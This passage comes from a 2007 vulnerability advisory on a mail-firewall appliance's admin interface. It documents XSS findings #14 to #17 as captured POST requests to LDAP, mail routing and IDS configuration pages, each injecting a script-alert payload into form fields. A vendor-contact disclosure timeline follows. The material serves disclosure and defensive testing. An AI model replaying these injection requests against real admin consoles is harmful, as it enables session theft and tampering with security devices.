.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit  
HTTP/1.0 200 OK  
Date: Mon, 19 Feb 2007 10:22:56 GMT  
Server: Apache  
Pragma: no-cache  
Cache-Control: no-store  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
.: [ XSS #14 ] :.  
  
POST  
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save  
HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Referer:  
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save  
Accept-Language: es-ES,en-us;q=0.5  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13  
Host: 172.0.0.2:10443  
Content-Length: 2842  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;  
tabbedMenuSelected=11;  
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;  
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;  
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;  
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E  
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit  
HTTP/1.0 200 OK  
Date: Mon, 19 Feb 2007 10:23:00 GMT  
Server: Apache  
Pragma: no-cache  
Cache-Control: no-store  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
.: [ XSS #15 ] :.  
  
POST  
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save  
HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Referer:  
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=init&procId=164  
Accept-Language: es-ES,en-us;q=0.5  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13  
Host: 172.0.0.2:10443  
Content-Length: 2842  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;  
tabbedMenuSelected=11;  
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;  
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;  
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;  
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E  
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit  
HTTP/1.0 200 OK  
Date: Mon, 19 Feb 2007 10:23:16 GMT  
Server: Apache  
Pragma: no-cache  
Cache-Control: no-store  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
.: [ XSS #16 ] :.  
  
POST  
https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=save  
HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Referer:  
https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=init&isMenuToggled=1  
Accept-Language: es-ES,en-us;q=0.5  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13  
Host: 172.0.0.2:10443  
Content-Length: 100  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;  
tabbedMenuSelected=11;  
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailFirewall_MailRoutingInternal.do%3Fmethod%3Dinit%26isMenuToggled%3D1;  
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2CMailRoutingMenu%2C;  
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;  
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E  
dtype=INBOUND&input1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&input2=&submitValue=Submit  
HTTP/1.0 200 OK  
Date: Mon, 19 Feb 2007 10:23:28 GMT  
Server: Apache  
Pragma: no-cache  
Cache-Control: no-store  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
.: [ XSS #17 ] :.  
  
POST https://172.0.0.2:10443/admin/mailIdsConfig.do?method=save HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Referer:  
https://172.0.0.2:10443/admin/mailIdsConfig.do?method=init&isMenuToggled=1&procId=90  
Accept-Language: es-ES,en-us;q=0.5  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13  
Host: 172.0.0.2:10443  
Content-Length: 2237  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;  
tabbedMenuSelected=11;  
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailIdsConfig.do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90;  
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2CMailRoutingMenu%2CMailIPSMenu%2CApplicationLevelMenu%2CMailIDSMenu%2CApplicationLevelMenu%2C;  
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;  
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E  
procId=10&rows%5B0%5D.attrName=pass_monitor&rows%5B0%5D.attrType=5&rows%5B0%5D.attrValidate=&rows%5B0%5D.attrValidateStr=&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=0&rows%5B0%5D.langTagId=2000006&rows%5B1%5D.attrName=enable_dos&rows%5B1%5D.attrType=5&rows%5B1%5D.attrValidate=&rows%5B1%5D.attrValidateStr=&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=0&rows%5B1%5D.langTagId=2000008&rows%5B2%5D.attrName=shm_timeout&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5B1-65535%5D&rows%5B2%5D.attrValidateStr=%5B1-65535%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=100&rows%5B2%5D.langTagId=2001009&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=shm_spamcount&rows%5B3%5D.attrType=2&rows%5B3%5D.attrValidate=%5B1-65535%5D&rows%5B3%5D.attrValidateStr=%5B1-65535%5D&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=100&rows%5B3%5D.langTagId=2001010&rows%5B3%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&rows%5B4%5D.attrName=passcrackswitch&rows%5B4%5D.attrType=5&rows%5B4%5D.attrValidate=&rows%5B4%5D.attrValidateStr=&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=0&rows%5B4%5D.langTagId=2004104&rows%5B5%5D.attrName=passcrackcount&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-100%5D&rows%5B5%5D.attrValidateStr=%5B1-100%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2004105&rows%5B5%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA3%27%29%3C%2Fscript%3E&rows%5B6%5D.attrName=passtimeout&rows%5B6%5D.attrType=2&rows%5B6%5D.attrValidate=%5B1-3600%5D&rows%5B6%5D.attrValidateStr=%5B1-3600%5D&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=60&rows%5B6%5D.langTagId=2004106&rows%5B6%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA4%27%29%3C%2Fscript%3E&submitValue=Submit  
HTTP/1.0 200 OK  
Date: Mon, 19 Feb 2007 10:24:22 GMT  
Server: Apache  
Pragma: no-cache  
Cache-Control: no-store  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
.: [ TIMELINE ] :.  
  
22/Mar/2007 - We publish the advisory.  
07/Mar/2007 - Second contact. Provider doesn't answered.  
27/Feb/2007 - First contact with provider.  
19/Feb/2007 - Vulnerabilities founded.  
`